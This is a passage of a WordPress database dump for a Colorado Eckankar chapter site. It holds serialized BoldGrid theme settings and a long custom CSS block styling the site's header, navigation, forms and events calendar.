hr{background:#333}.palette-primary #menu-social li a,.palette-primary .navbar-default .navbar-nav > li > a{color:#333}.palette-primary .navbar-default .navbar-nav > li.dropdown:hover > a,.palette-primary .dropdown .active,.palette-primary ul.dropdown-menu{background:#fff;color:#333}.palette-primary #reviews #comments ol.commentlist li .comment-text{border:1px solid #333}.palette-primary hr{border-color:#333}.palette-primary .panel-default{border-color:#fff}@media only screen and (min-width:768px){.palette-primary header.smaller{background:#fff}}.palette-primary .button-primary,.palette-primary .pager li > a{border:1px solid #2964db;color:#2964db}.palette-primary .call-to-action .button-primary{background:#fff;border-color:#2964db;color:#2964db}.palette-primary .button-primary:hover,.palette-primary .button-primary:focus,.palette-primary .button-primary:active,.palette-primary .open > .dropdown-toggle.btn-primary,.palette-primary .pager li > a:hover,.palette-primary .pager li > a:active,.palette-primary .alert .button-primary,.palette-primary .woocommerce-Message .button-primary{background-color:#2964db;border-color:#2964db;color:#fff}.palette-primary .alert-message .button-primary:hover,.palette-primary .woocommerce-Message .button-primary:hover{background-color:transparent;border:1px solid #2964db;color:#2964db}.palette-primary .gridblock ul li:before{background-color:#2964db}.palette-primary .navbar-default .navbar-toggle{border-color:#2964db}.palette-primary .navbar-default .navbar-nav > .current-menu-parent > a{color:#2964db}.palette-primary .navbar-default .navbar-nav > .active > a{color:#2964db;background:none}.palette-primary .navbar-default .navbar-nav > .active > a:hover,.palette-primary .navbar-default .navbar-nav > .active > a:focus{color:#2964db;background:none}.palette-primary .navbar-default .navbar-nav > li > a:hover,.palette-primary .navbar-default .navbar-nav > li > a:focus{color:#2964db;background:none}.palette-primary .navbar-default .navbar-nav .dropdown .dropdown-menu > .active > a{background:#2964db;color:#fff}.palette-primary .navbar-default .navbar-nav .dropdown .dropdown-menu > .active > a:hover,.palette-primary .navbar-default .navbar-nav .dropdown .dropdown-menu > .active > a:focus{background:#2964db;color:#fff}.palette-primary .navbar-default .navbar-nav .dropdown .dropdown-menu > li > a{color:#333}.palette-primary .navbar-default .navbar-nav .dropdown .dropdown-menu > li > a:hover,.palette-primary .navbar-default .navbar-nav .dropdown .dropdown-menu > li > a:focus{background:#2964db;color:#fff}.palette-primary a,.palette-primary .menu-item a,.palette-primary #menu-social a[href]:hover,.palette-primary #menu-social li.current_page_item a,.palette-primary #colophon li.current_page_item a,.palette-primary .menu-social li .fa,.palette-primary .mod-alpha h3,.palette-primary .widget.well a,.palette-primary caption,.palette-primary #menu-social li a:hover,.palette-primary .navbar-default .navbar-nav > .active > a,.palette-primary .navbar-default .navbar-nav > .active > a:hover,.palette-primary .navbar-default .navbar-nav > .active > a:focus,.palette-primary .navbar-default .navbar-nav > li > a:hover,.palette-primary .navbar-default .navbar-nav > li > a:focus{color:#2964db}.palette-primary #secondary-menu,.palette-primary #tertiary-menu{background:rgba(41, 100, 219, 0.8)}.palette-primary #secondary-menu a,.palette-primary #tertiary-menu a{color:#fff}.palette-primary .mod-blockquote{border-left:6px solid #2964db}.palette-primary .nav > li > a:focus,.palette-primary .nav > li > a:hover,.palette-primary .navbar-default .navbar-toggle:hover,.palette-primary .navbar-default .navbar-toggle:focus,.palette-primary #colophon .widget.well li.current_page_item a:focus,.palette-primary #colophon .widget.well li.current_page_item a:hover,.palette-primary .mark,.palette-primary mark{background-color:#2964db;color:#fff}.palette-primary .well{border:1px solid #2964db}.palette-primary #secondary-menu a[href]:hover,.palette-primary #secondary-menu li.current_page_item a,.palette-primary #tertiary-menu a[href]:hover,.palette-primary #tertiary-menu li.current_page_item a,.palette-primary .entry-content ul li,.palette-primary h2,.palette-primary h3,.palette-primary .widget-title,.palette-primary .mod-beta h2{color:#3e3e3e}.palette-primary #footer-widget-area{border-top:1px solid #3e3e3e}.palette-primary .button-secondary{border:1px solid #3e3e3e;color:#3e3e3e}.palette-primary .button-secondary:hover,.palette-primary .button-secondary:active{background-color:#3e3e3e;color:#fff}.palette-primary .navbar-default .navbar-toggle .icon-bar,.palette-primary .navbar-default .navbar-toggle:hover .icon-bar,.palette-primary .navbar-default .navbar-toggle:focus .icon-bar{background-color:#3e3e3e}.palette-primary .site-title a,.palette-primary .site-description,.palette-primary .menu-social li:hover .fa,.palette-primary .menu-social li:focus .fa{color:#333}.palette-primary.single .entry-title a,.palette-primary.archive .entry-title a,.palette-primary.single .entry-title a:hover,.palette-primary.archive .entry-title a:hover,.palette-primary.single .entry-title a:focus,.palette-primary.archive .entry-title a:focus{color:#333;text-shadow:none}.palette-primary.blog .entry-title a{text-shadow:none;color:#333}.palette-primary.mce-content-body,.palette-primary.error404 .site-content,.palette-primary.blog .site-content,.palette-primary.search .site-content,.palette-primary.single .main,.palette-primary.archive .main{background:#fff;color:#333}.palette-primary.woocommerce .color1-color,.palette-primary.woocommerce-page .color1-color{color:#2964db !important}.palette-primary.woocommerce-page .color-1-text-contrast-hover:hover,.palette-primary.woocommerce-page .color-1-text-contrast-hover:focus{color:#333 !important}.palette-primary.woocommerce div.product span.price{color:#2964db}.palette-primary.woocommerce div.product .stock{color:#333}\";s:18:\"_boldgrid_theme_id\";i:32;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1562362856;s:4:\"data\";a:5:{s:19:\"wp_inactive_widgets\";a:1:{i:0;s:13:\"custom_html-4\";}s:9:\"sidebar-1\";a:0:{}s:17:\"boldgrid-widget-2\";a:0:{}s:17:\"boldgrid-widget-3\";a:1:{i:0;s:22:\"black-studio-tinymce-0\";}s:17:\"boldgrid-widget-1\";a:1:{i:0;s:22:\"black-studio-tinymce-1\";}}}s:18:\"nav_menu_locations\";a:5:{s:7:\"primary\";i:63;s:6:\"social\";i:8;s:12:\"primary_wpac\";i:0;s:9:\"secondary\";i:0;s:8:\"tertiary\";i:0;}s:13:\"bgtfw_version\";s:6:\"1.7.11\";s:22:\"boldgrid_color_palette\";s:294:\"{\"state\":{\"active-palette\":\"palette-primary\",\"palettes\":{\"palette-primary\":{\"format\":\"palette-primary\",\"colors\":[\"rgb(255, 255, 255)\",\"rgb(41, 100, 219)\",\"rgb(62, 62, 62)\"]}},\"saved_palettes\":[{\"format\":\"palette-primary\",\"colors\":[\"rgb(255, 255, 255)\",\"rgb(41, 100, 219)\",\"rgb(62, 62, 62)\"]}]}}\";s:22:\"boldgrid_palette_class\";s:15:\"palette-primary\";s:18:\"custom_css_post_id\";i:-1;s:20:\"boldgrid_font_toggle\";b:1;s:14:\"logo_font_size\";s:2:\"31\";s:26:\"logo_text_decoration_hover\";s:4:\"none\";s:24:\"boldgrid_position_toggle\";b:1;s:15:\"logo_margin_top\";s:3:\"-20\";s:21:\"background_attachment\";s:8:\"parallax\";s:30:\"boldgrid_background_image_size\";s:5:\"cover\";s:21:\"boldgrid_logo_setting\";i:267815;s:30:\"navigation_primary_font_family\";s:8:\"Overpass\";s:28:\"navigation_primary_font_size\";s:2:\"16\";s:33:\"navigation_primary_text_transform\";s:10:\"capitalize\";s:28:\"alternate_headings_font_size\";s:2:\"14\";s:18:\"logo_margin_bottom\";s:2:\"18\";s:25:\"hide_boldgrid_attribution\";b:1;s:26:\"hide_wordpress_attribution\";b:1;s:24:\"hide_partner_attribution\";b:1;s:31:\"hide_special_thanks_attribution\";b:1;s:20:\"boldgrid_header_html\";s:0:\"\";s:16:\"logo_line_height\";s:3:\"150\";s:19:\"logo_letter_spacing\";s:1:\"1\";s:16:\"logo_margin_left\";s:3:\"-15\";s:37:\"boldgrid_background_vertical_position\";s:1:\"0\";s:16:\"custom_theme_css\";s:0:\"\";s:22:\"logo_shadow_horizontal\";s:1:\"5\";s:32:\"passster_form_error_message_text\";s:72:\"Hmmm...  looks like that was not the correct password. Please try again.\";s:44:\"passster_form_error_message_background_color\";s:7:\"#c4c4c4\";s:41:\"passster_form_instructions_headline_color\";s:7:\"#333333\";s:18:\"boldgrid_logo_size\";s:3:\"235\";s:24:\"boldgrid_background_type\";s:5:\"image\";s:16:\"background_image\";s:85:\"https://eckankar-colorado.org/wp-content/uploads/2023/09/fall-bridge-over-water-1.jpg\";}','yes'),(3345,'sccss_settings','a:1:{s:13:\"sccss-content\";s:22039:\"/* iOS - iPAD, iPHONE -- HOME PAGE BACKGROUND DISPLAY FIX - WITHOUT THIS, BACKGROUND IMAGES SET TO \'COVER\' WILL NOT RESIZE ON MOBILE  -- DO NOT DELETE */\r\n\r\nbody:after{\r\n      content:\"\";\r\n      position:fixed; /* stretch a fixed position to the whole screen */\r\n	    top:0;\r\n      height:100vh; /* fix for mobile browser address bar appearing disappearing */\r\n      left:0;\r\n      right:0;\r\n      z-index:-1; /* needed to keep in the background */\r\n      background: url(https://eckankar-colorado.org/wp-content/uploads/2023/09/fall-bridge-over-water-1.jpg) center center;\r\n	      -webkit-background-size: cover;\r\n      -moz-background-size: cover;\r\n      -o-background-size: cover;\r\n      background-size: cover;\r\n} \r\n/* END IOS FIX */\r\n\r\n/* ADDS BACKGROUND COLOR WHICH WILL LOAD WHILE WAITING FOR SPLASH IMAGE TO LOAD -- FOR SLOWER INTERNET CONNECTIONS - THIS WAY THE USER WILL AT LEAST SEE THE TEXT WHILE WAITING FOR IMAGE LOAD */\r\nbody.custom-background {\r\n    background-color:  rgba(59, 125, 209, 1) !important;\r\n}\r\n\r\n/* CHANGE HEADER TO STATIC */\r\n.site-header {\r\n    position: static;\r\n    left: 0;\r\n    margin-bottom: 50px;\r\n    padding-bottom: 0;\r\n    width: 100%;\r\n		margin-top: -22px; \r\n}  \r\n/* CHANGE HEADER BACKGROUND COLOR*/\r\n.header {\r\n  background: #ffffff;\r\n}\r\n\r\n/* REMOVE HEADER ON HU-COLORADO LANDING PAGE  --- DO NOT REMOVE*/\r\n.page-id-91821 .site-header {\r\n  display: none;\r\n}\r\n/* REMOVES FOOTER ON HU-COLORADO LANDING PAGE  --- DO NOT REMOVE*/\r\n.page-id-91821 .site-footer, .entry-footer {\r\n  display: none;\r\n}\r\n\r\n/* CHANGE PRIMARY NAVIGATION MENU LOCATION */\r\n.navbar-default {\r\n    float: left;\r\n	  margin-top: -33px;\r\n	}\r\n\r\n\r\n/* CHANGE NAVBAR HEIGHT */\r\n.navbar {\r\n    min-height: 0px;\r\n}\r\n/* CHANGE PRIMARY NAVIGATION MENU COLORS ETC*/\r\n.palette-primary a, .palette-primary .menu-item a, .palette-primary .navbar-default .navbar-nav > .active > a, .palette-primary .navbar-default .navbar-nav > .active  {\r\n    color: #333333 !important;\r\n}\r\n.palette-primary .navbar-default .navbar-nav .dropdown .dropdown-menu > li > a:hover, .palette-primary .navbar-default .navbar-nav .dropdown .dropdown-menu > li > a:focus {\r\n    background: #a0c0ff;\r\n    color: #fff;\r\n}\r\n/* CHANGE PRIMARY NAVIGATION MENU HOVER COLOR */\r\n.palette-primary .navbar-default .navbar-nav > li > a:hover {\r\n	color: #cd8a0e !important;\r\n}\r\n/* NAVIGATION MENU DROPDOWN */\r\n.dropdown-menu > li > a {\r\n    padding: 5px 6px;\r\n}\r\n/* MOBILE NAVIGATION TOGGLE BUTTON */\r\n.navbar-toggle {\r\n  float: left;\r\n}\r\n\r\n/* SITE TITLE CHANGES*/\r\n.site-title a {\r\n    color: #1D5791 !important;\r\n    letter-spacing: .06em !important;\r\n    text-transform: capitalize;\r\n    font-size: 1em;\r\n}\r\n/* HEADER TAGLINE CHANGES*/\r\n.h5.alt-font {\r\n    font-size: 17px !important;\r\n    letter-spacing: .07em !important;\r\n    margin-top: -10px !important;\r\n		color: #1d5791 !important;\r\n	  margin-bottom: 6px;\r\n	}\r\n/* SOCIAL MEDIA HOVER COLOR */\r\n.palette-primary .menu-social li:hover .fa {\r\n    color: #cd8a0e;\r\n}\r\n/*SOCIAL ICONS TOP OF PAGE */\r\n.fa-lg {\r\n    line-height: .75em;\r\n    vertical-align: -15%;\r\n}\r\n.social-menu ul li a {\r\n    font-family: Oswald, Helvetica, Arial, sans-serif;\r\n    font-size: 16px !important;\r\n    text-transform: uppercase;\r\n}\r\n.menu-social {\r\n    margin-top: -16px;\r\n}\r\n\r\n/* USING TO CLOSE GAP ON EVENTS CALENDAR */\r\n#content, .site-content {\r\n   margin-top: -92px !important;\r\n	 padding-top: 0px !important;\r\n}\r\n/* TURN OFF BOX SHADOW BORDER IN WELL */\r\n.well {\r\n    min-height: 20px;\r\n    padding: 19px;\r\n    margin-bottom: 20px;\r\n    background-color: #f5f5f5;\r\n    border: 1px solid #e3e3e3;\r\n    border-radius: 4px;\r\n    box-shadow: none !important;\r\n}\r\n/* REMOVE BACKGROUND AND BORDER FROM INTRO TEXT ---.....DISCOVER YOUR TRUE.....*/\r\n.palette-primary .well {\r\n    border: none;\r\n    background: none;\r\n}\r\n/* ADJUSTS MARGIN AT BOTTOM OF HOME PAGE INTRO TEXT.....DISCOVER YOUR TRUE.....*/\r\n.entry-content {\r\n    margin-top: 40px;\r\n    padding-top: 0px;\r\n	  padding-bottom: 0px;\r\n}\r\n/* CHANGES MARGIN BELOW HEADER WHERE PAGE CONTENT STARTS  --- THIS HELPS WITH HEADER JUMP IN GOOGLE CHROME */\r\n.page-template-default .entry-content {\r\n    margin-top: 0px;\r\n}\r\n/* CHANGE BUTTON SIZE FOR ECK INFO GROUP ON HOME PAGE*/\r\n.eckinfo-small-btn {\r\n    width:200px;\r\n}\r\n/* TABS ADUSTMENTS */\r\n#tab_container_15806 .wpsm_nav-tabs > li {\r\n    margin-right: 3px !important;\r\n}\r\ndiv #tab_container_15806 .wpsm_nav-tabs > li > a {\r\n    margin-right: 0px !important;\r\n    line-height: 1.42857143 !important;\r\n    border: 1px solid #e1e1e1 !important;\r\n    border-radius: 5px 5px 0 0 !important;\r\n    background-color: #f4f4f4 !important;\r\n    color: #8a8888 !important;\r\n    padding: 7px 6px 7px 6px !important;\r\n    text-decoration: none !important;\r\n    font-size: 14px !important;\r\n    text-align: center !important;\r\n    font-family: Open Sans !important;\r\n}\r\n/* CHANGE TABS SEPARATION MARGINS*/\r\n#tab_container_15806 .wpsm_nav-tabs > li {\r\n    margin-right: 3px !important;\r\n}\r\n#tab_container_15806 .wpsm_nav-tabs {\r\n    font-weight: bold;\r\n}\r\n/* CHANGE TABS HOVER COLOR */\r\ndiv#tab_container_15806 .wpsm_nav-tabs > li > a:hover, #tab_container_15806 .wpsm_nav-tabs > li > a:focus {\r\n    color: #cd8a0e !important;\r\n}\r\n/* CHANGE ENTIRE SITE LINK COLORS */\r\na:link {color:#2A5DB0 !important;} /* unvisited link */\r\na:visited {color:#2A5DB0 !important;}  /* visited link */\r\na:hover {color:#cd8a0e !important	;} /* mouse over link */\r\n\r\n\r\n/* CHANGE LINK COLOR FOR VARIOUS BUTTONS */\r\n  .btn-color-1:hover, .btn-color-1-flat:hover, .btn-color-1:focus, .btn-color-1-flat:focus {\r\n    background-color: #fff;\r\n    border-color: #fff;\r\n    color: #f28a27 !important;\r\n}\r\n/*FOOTER LINKS*/\r\na.footerone:link {\r\n	color:#c0c0c0 !important;\r\n	text-decoration: none;\r\n}\r\na.footerone:visited {\r\n	color:#c0c0c0 !important;\r\n}\r\na.footerone:hover {\r\n	color:#cd8a0e !important;\r\n}\r\n/*FOOTER SOCIAL LINKS*/\r\n.fa:hover {\r\n   color: #f27a28;\r\n}\r\n.fa-facebook {\r\n  color: #c0c0c0;\r\n}\r\n.fa-twitter {\r\n  color: #c0c0c0; \r\n}\r\n.fa-instagram {\r\n  color: #c0c0c0;\r\n}\r\n.fa-youtube {\r\n  color: #c0c0c0;\r\n}\r\n.fa-meetup {\r\n  color: #c0c0c0;\r\n}\r\n\r\n\r\n\r\n/*PASSSTER PASSWORD PROTECTION FOR CONTENT PLUGIN --- CHANGES*/\r\n#password-form {\r\n    text-align: center;\r\n}\r\n/*\r\n.passster-form #passster_submit:hover {\r\n    color: #FFFFFF;\r\n    background: #f28a27;\r\n} */\r\n.shortcode-copy {\r\n    background: transparent;\r\n}\r\n/*END PASSSTER PASSWORD PROTECTION FOR CONTENT PLUGIN --- CHANGES*/\r\n\r\n/* BEGIN NINJA FORMS */\r\n\r\n/*CHANGE SUBMIT BUTTON COLOR*/\r\n.nf-form-content button, .nf-form-content input[type=button], .nf-form-content input[type=submit] {\r\n    background: #1d5791 !important;\r\n}\r\n\r\n/*NINJA FORMS -- TURN OFF \"Fields marked with an * are required\" TEXT MESSAGE*/\r\n.nf-form-fields-required {\r\n  display: none;\r\n}\r\n/*CHANGE TITLE COLOR*/\r\n.nf-form-title {\r\ncolor: #23507d !important;\r\n}\r\n/*REQUIRED FIELDS ASTERISK COLOR*/\r\n.ninja-forms-req-symbol {\r\ncolor: #ec4d4d !important;\r\n}\r\n\r\n/*CHANGES DROPDOWN OPTION TEXT COLOR*/\r\n.listcolor1\r\n{color:#1156c7 !important}\r\n\r\n\r\n/* ADJUSTS TOP MARGIN OF NINJA FORMS SOS REGISTRATION FORM - ON SINGLE PAGE VIEW OF THE MODERN EVENTS CALENDAR */\r\n#nf-form-44_3-cont {\r\n	margin-top:-15px !important;\r\n}\r\n/* BACKGROUND COLOR FOR SATSANG REGISTRATION -- FORM 58*/\r\n#nf-form-58-cont {\r\n background-color: #ffffff; \r\n padding: 15px;\r\n opacity: 0.9;\r\n border-radius: 9px;\r\n box-shadow: 0px 3px 5px #444;\r\n }\r\n\r\n.nf-form-content button:hover, .nf-form-content input[type=\"button\"]:hover, .nf-form-content input[type=\"submit\"]:hover {\r\n  background: #c4c4c4;\r\n  color: #f27a28;\r\n  transition: all .5s;\r\n}\r\n\r\n\r\n\r\n/* END NINJA FORMS CHANGES*/\r\n\r\n/*FOOTER*/\r\n.site-footer {\r\n    padding: 0em 0;\r\n}\r\n\r\n\r\n\r\n/* CUSTOM REGISTRATION BUTTON FOR MEETUP EVENTS */\r\n.meetupreg {\r\n	box-shadow:inset 0px 1px 0px 0px #ffffff;\r\n	background:linear-gradient(to bottom, #f9f9f9 5%, #e9e9e9 100%);\r\n	background-color:#f9f9f9;\r\n	border-radius:6px;\r\n	border:2px solid #e3e3e3;\r\n	display:inline-block;\r\n	cursor:pointer;\r\n	color:#1523a3;\r\n	font-family:Arial;\r\n	font-size:18px;\r\n	font-weight:bold;\r\n	padding:4px 23px;\r\n	text-decoration:none;\r\n	text-shadow:0px 1px 0px #ffffff;\r\n}\r\n.meetupreg:hover {\r\n	background:linear-gradient(to bottom, #e9e9e9 5%, #f9f9f9 100%);\r\n	background-color:#e9e9e9;\r\n}\r\n.meetupreg:active {\r\n	position:relative;\r\n	top:1px;\r\n}\r\n/* END CUSTOM REGISTRATION BUTTON FOR MEETUP EVENTS */\r\n\r\n\r\n/* CUSTOM REGISTRATION BUTTON FOR SOS AND ELSS EVENTS */\r\n.reg3Button {\r\n    display: inline-block;\r\n    text-align: center;\r\n    vertical-align: middle;\r\n    padding: 12px 24px;\r\n    border: 1px solid #dca746;\r\n    border-radius: 8px;\r\n    background: #ffbd12;\r\n    background: -webkit-gradient(linear, left top, left bottom, from(#ffbd12), to(#b3790e));\r\n    background: -moz-linear-gradient(top, #ffbd12, #b3790e);\r\n    background: linear-gradient(to bottom, #ffbd12, #b3790e);\r\n    -webkit-box-shadow: #b0b0b0 0px 6px 8px 0px;\r\n    -moz-box-shadow: #b0b0b0 0px 6px 8px 0px;\r\n    box-shadow: #b0b0b0 0px 6px 8px 0px;\r\n	  font-family: arial;\r\n	  font-size:16px;\r\n	  font-weight: bold;\r\n	  color: #333333 !important;\r\n    text-decoration: none;\r\n}\r\n.reg3Button:hover {\r\n    border: 1px solid #f6a410;\r\n    background: #ffe316;\r\n    background: -webkit-gradient(linear, left top, left bottom, from(#ffe316), to(#d79111));\r\n    background: -moz-linear-gradient(top, #ffe316, #d79111);\r\n    background: linear-gradient(to bottom, #ffe316, #d79111);\r\n    color: #ffffff !important;\r\n    text-decoration: none;\r\n}\r\n.reg3Button:active {\r\n    background: #ac730b;\r\n    background: -webkit-gradient(linear, left top, left bottom, from(#ac730b), to(#b3790e));\r\n    background: -moz-linear-gradient(top, #ac730b, #b3790e);\r\n    background: linear-gradient(to bottom, #ac730b, #b3790e);\r\n}\r\n/* END CUSTOM REGISTRATION BUTTON FOR SOS AND ELSS EVENTS */\r\n\r\n\r\n/*SPECIAL WHITE LINK    TESTING TESTING*/\r\n\r\na.whitelink:link {color: #ffffff !important;}\r\na.whitelink:visited {color: #ffffff !important;}\r\na.whitelink:hover {color: #f0f700 !important;}\r\n\r\n\r\n\r\n\r\n/* MODERN EVENTS CALENDAR CSS*/\r\n\r\n/* SINGLE EVENT PAGE */\r\n/* LOCATION ADDRESS */\r\n.mec-single-event .mec-event-meta .mec-events-address .mec-address, .mec-single-event .mec-event-meta .mec-location-opening-hour span, .mec-single-event .mec-event-meta .mec-location-url span {\r\n  font-size: 16px;\r\n  color: #686868;\r\n  font-weight: 500 !important;\r\n}\r\n/* LOCATION TITLE */\r\n.mec-single-event .mec-event-meta .mec-events-event-categories a, .mec-single-event .mec-event-meta dd {\r\n    font-size: 16px;\r\n    color: #686868;\r\n    font-weight: 500 !important;\r\n}\r\n/* MEC START DATE LABEL */\r\n.mec-start-date-label {\r\n    font-weight: 500;\r\n    color: #686868;\r\n}\r\n/* TIME DURATION */\r\n.mec-events-abbr {\r\n    font-weight: 500 !important;\r\n    color: #686868;\r\n}\r\n/* SINGLE PAGE -- EVENT DESCRIPTION TEXT COLOR CHANGE */\r\n.mec-wrap :not(.elementor-widget-container) > p {\r\n  margin: 0 0 20px 0;\r\n  color: #686868;\r\n}\r\n/* SINGLE PAGE -- EVENT DESCRIPTION FONT SIZE */\r\n.mec-single-event .mec-event-meta h6, .mec-single-event-sponsor span {\r\n  font-size: 16px;\r\n  padding-bottom: 5px;\r\n  display: inline-block;\r\n  color: #8d8d8d;\r\n}\r\n/* SINGLE PAGE -- LOCATION LABEL - MARGIN-LEFT */\r\n.mec-single-event .mec-event-meta .mec-single-event-additional-locations .mec-events-single-section-title, .mec-single-event .mec-event-meta .mec-single-event-additional-organizers .mec-events-single-section-title, .mec-single-event .mec-event-meta .mec-single-event-location .mec-events-single-section-title, .mec-single-event .mec-event-meta .mec-single-event-organizer .mec-events-single-section-title, .mec-single-event .mec-events-meta-date h3 {\r\n  padding: 0 0 5px 10px;\r\n  margin-top: 0;\r\n  display: inline-block;\r\n  margin-left: 15px;\r\n}\r\n\r\n/* END SINGLE EVENT PAGE */\r\n\r\n\r\n/* CHANGE MEC LABEL APPEARANCE */\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-footer-carousel-type3 .mec-labels-normal .mec-label-normal, .mec-liquid-wrap.mec-skin-carousel-container .mec-event-footer-carousel-type3 .mec-cancellation-reason span {\r\n  color: #fff;\r\n  font-size: 17px;\r\n  font-weight: 500;\r\n	display: block;\r\n	text-align: center;\r\n  margin-top: 5px;\r\n	padding: 5px;\r\n	box-shadow: #d8d8d8 0px 6px 5px;\r\n}\r\n\r\n/* MAKES DATE FONT SMALLER*/\r\n.mec-calendar.mec-event-container-simple dl dt.mec-calendar-day {\r\n    font-size: 13px;\r\n    color: #0009;\r\n}\r\n/* CHANGES CALENDAR MONTH FONT COLOR */\r\n.mec-calendar .mec-calendar-header h2 {\r\n    text-transform: uppercase;\r\n    font-size: 22px;\r\n    font-weight: 700;\r\n    color: #24619f;\r\n}\r\n/* CALENDAR TABLE HEAD BACKGROUND COLOR */\r\n.mec-box-calendar.mec-calendar.mec-event-calendar-classic .mec-calendar-table-head dt {\r\n    background-color: #dadbe0;\r\n}\r\n/* EVENT COLOR IN CALENDAR MONTH BOX*/\r\n.mec-event-container-simple .mec-monthly-tooltip h4 {\r\n    font-size: 13px;\r\n    font-weight: 500;\r\n    margin: 0;\r\n    color: #23507D;\r\n	  text-transform: capitalize !important;\r\n}\r\n/* FIXES SIDEBAR DISPLAY ERROR WHEN LOGGED IN AS AN ADMIN */\r\n.single-mec-events .empty-sidebar-message {display:none}\r\n\r\n.mec-wrap .mec-single-title, .single-mec-events .mec-wrap.mec-no-access-error h1 {\r\n   \r\n	text-transform: capitalize !important;\r\n}\r\n\r\n/* ---MEC FLUENT VIEW CAROUSEL EDITS--- */\r\n\r\n.mec-fluent-wrap.mec-skin-carousel-container .mec-date-wrap {\r\n    background-color: rgb(0 50 106 / 0.8) !important;\r\n}\r\n.mec-fluent-wrap.mec-skin-carousel-container .mec-event-date span, .mec-wrap.mec-fluent-wrap.mec-skin-carousel-container .mec-event-day span {\r\n    color: #ffffff   !important;\r\n}\r\n.mec-fluent-wrap.mec-skin-available-spot-container .mec-event-content .mec-event-title a, .mec-fluent-wrap.mec-skin-carousel-container .event-carousel-type2-head .mec-carousel-content .mec-event-content .mec-event-title a, .mec-fluent-wrap.mec-skin-countdown-container .mec-event-content .mec-event-title a, .mec-fluent-wrap.mec-skin-cover-container .mec-event-content .mec-event-title a, .mec-fluent-wrap.mec-skin-masonry-container .mec-masonry .mec-masonry-content .mec-event-content .mec-event-title a, .mec-fluent-wrap.mec-skin-slider-container .mec-event-content .mec-event-title a {\r\n    color: #ffffff;\r\n    font-weight: 500;\r\n    font-size: 18px;\r\n    line-height: 24px;\r\n    text-transform: capitalize;\r\n}\r\n.mec-fluent-wrap.mec-skin-carousel-container .mec-event-location address{\r\n    font-size: 13px !important;\r\n}\r\n\r\n.single-mec-events #header, .single-mec-events #page hr {\r\n    display: none;\r\n}\r\n\r\n.mec-container {\r\n    margin-top: 40px;\r\n}\r\n\r\nh3:not(.alt-font):not(.site-description), .h3 {\r\n    color: #1d5791;\r\n}\r\n/* ---END MEC FLUENT VIEW CAROUSEL EDITS--- */\r\n\r\n\r\n/* ---MEC LIQUID LAYOUT VIEW CAROUSEL EDITS --- */\r\n\r\n/* --- LIQUID NAVIGATION -- TURNED OFF BORDER FOR BETTER MOBILE DISPLAY--- */\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-carousel-liquid .owl-nav, .mec-liquid-wrap.mec-skin-slider-container .mec-slider-t1-wrap .owl-nav {\r\n  border: 0px solid #00acf8;\r\n}\r\n/* --- LIQUID NAVIGATION ARROWS-- CHANGED FONT SIZE, WEIGHT, & COLOR--- */\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-carousel-liquid .mec-owl-theme .owl-nav .owl-next i, .mec-liquid-wrap.mec-skin-carousel-container .mec-event-carousel-liquid .mec-owl-theme .owl-nav .owl-prev i, .mec-liquid-wrap.mec-skin-slider-container .mec-slider-t1-wrap .mec-owl-theme .owl-nav .owl-next i, .mec-liquid-wrap.mec-skin-slider-container .mec-slider-t1-wrap .mec-owl-theme .owl-nav .owl-prev i {\r\n  color: #0894d2;\r\n  font-size: 38px;\r\n  font-weight: 700;\r\n  line-height: 9px;\r\n  display: inline-block;\r\n  -webkit-transform: translate(0,-1px);\r\n  transform: translate(0,-1px);\r\n}\r\n/* --- LIQUID NAVIGATION ARROWS -DECREASED SPACE ABOVE SLIDER --- */\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-carousel-liquid .mec-owl-crousel-skin-type3 {\r\n  padding-top: 46px;\r\n}\r\n/* --- LIQUID NAVIGATION ARROWS - HOVER COLOR --- */\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-carousel-liquid .mec-owl-theme .owl-nav .owl-prev i:hover, .mec-liquid-wrap.mec-skin-carousel-container .mec-event-carousel-liquid .mec-owl-theme .owl-nav .owl-next i:hover, .mec-liquid-wrap.mec-skin-slider-container .mec-slider-t1-wrap .mec-owl-theme .owl-nav .owl-next:hover i, .mec-liquid-wrap.mec-skin-slider-container .mec-slider-t1-wrap .mec-owl-theme .owl-nav .owl-prev:hover i {\r\n  color: #F28A27;\r\n}\r\n\r\n/* ---EVENT TITLE TEXT--- */\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-footer-carousel-type3 h4 {\r\n  font-size: 23px;\r\n  line-height: 28px;\r\n  font-weight: 600;\r\n  padding: 0 27px 0;\r\n  margin: 15px 0 10px;\r\n  text-transform: capitalize !important;\r\n}\r\n.mec-liquid-wrap .mec-booking-button:hover, .mec-liquid-wrap .event-carousel-type3-head .mec-event-footer-carousel-type3 .mec-booking-button:hover {\r\n  background-color: #ebf9ff;\r\n  border-color: #00acf8;\r\n  color: #00acf8;\r\n  box-shadow: 0 4px 10px rgba(0,172,248,.2);\r\n}\r\n.mec-liquid-wrap .mec-booking-button, .mec-liquid-wrap .event-carousel-type3-head .mec-event-footer-carousel-type3 .mec-booking-button, .mec-liquid-wrap .event-carousel-type3-head .mec-event-footer-carousel-type3 .mec-mb-button {\r\n  color: #fff;\r\n  font-size: 13px;\r\n  font-weight: 600;\r\n  line-height: 17px;\r\n  text-transform: none;\r\n   outline: none;\r\n  border-radius: 7px;\r\n  padding: 11px 17px 12px;\r\n  cursor: pointer;\r\n  margin-right: 10px;\r\n  -webkit-transition: all .3s ease;\r\n  transition: all .3s ease;\r\n  white-space: nowrap;\r\n  text-decoration: none;\r\n  border: 1px solid #c7ebfb;\r\n  background: #f6fbff;\r\n}\r\n.mec-liquid-wrap.mec-skin-carousel-container .event-carousel-type3-head .mec-event-image {\r\n  padding: 6px;\r\n}\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-footer-carousel-type3 .mec-event-datetime-info-wrap .mec-event-date-info .mec-event-day span {\r\n  color: #fff !important;\r\n  text-align: left;\r\n}\r\n\r\n/* ---DATE TIME TEXT-- */\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-footer-carousel-type3 .mec-event-datetime-info-wrap span {\r\n  font-size: 15px !important;\r\n  font-weight: 500;\r\n  margin: 0 0 3px;\r\n}\r\n.mec-liquid-wrap.mec-skin-carousel-container .mec-event-carousel-type3 .mec-event-datetime-info-wrap {\r\n  display: flex;\r\n  justify-content: space-between;\r\n  margin-top: 10px;\r\n  background: rgba(0, 50, 106, 0.8) 